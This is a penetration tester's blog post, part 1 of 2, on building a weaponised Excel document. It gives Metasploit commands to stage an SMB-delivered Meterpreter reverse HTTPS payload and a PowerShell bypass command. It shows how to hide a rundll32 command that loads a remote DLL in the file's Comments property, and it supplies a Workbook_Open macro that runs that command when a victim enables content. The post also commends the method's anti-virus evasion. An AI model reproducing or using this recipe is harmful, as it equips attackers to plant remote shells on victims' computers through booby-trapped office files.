by James Smith

Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)


As a penetration tester I’m always excited to see new and creative methods on creating weaponized MS Office documents.  This blog post builds on the following findings published by Black Hills InfoSec:

There are numerous ways on how MS Office documents can be abused and weaponised to deliver a variety of cyber-related attacks.  This blog post will demonstrate how quickly and easy it is to hide a Metasploit and Empire payload within a MS Office document and execute it from an embedded Macro.


In the first example I’m going to use a payload generated with Metasploits ‘SMB Delivery’ functionality to Weaponise a MS Excel document.  The ‘SMB Delivery’ is a personal favourite of mine given its simplicity and subtle anti-virus evasion.

Begin by loading the relevant module into Metasploit:

use exploit/windows/smb/smb_delivery





Set the payload to anything you desire, in this example I’ll be using the Windows Meterpreter Reverse HTTPS payload:

set PAYLOAD windows/meterpreter/reverse_https




Finally, issue the ‘exploit’ command to begin staging the attack:


Now, in order to utilise this, we will need execute the following command on the victim host:

rundll32.exe \\\PPuUdw\test.dll,0



Note: the folder path is randomly generated as we didn’t explicitly define it within the Metasploit options

In order to achieve this, we’re going to embed this command into a MS Excel document within the ‘comments’ property and execute it from an embedded Macro.  This can easily be done by using the Powershell script: ‘Commentator’ (


Begin by starting PowerShell:

powershell.exe -exec bypass



Import the module into your PowerShell environment:

Import-Module .\Commentator.ps1



And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:

Invoke-Commentator -OfficeFile .\msf_smb_delivery.xlsx -Comment "rundll32.exe \\\PPuUdw\test.dll,0"




After successful execution, a copy of your existing MS Office file will be created with the payload embedded:

The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.


This can be verified by inspecting the file’s metadata / properties:


Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:


Sub Workbook_Open()

Dim p As DocumentProperty


 For Each p In ActiveWorkbook.BuiltinDocumentProperties

    If p.Name = "Comments" Then

        Shell (p.Value)

    End If


End Sub




Note: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)

After the victim has clicked ‘enable editing’ and ‘enable content’, a Meterpreter session should appear:


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.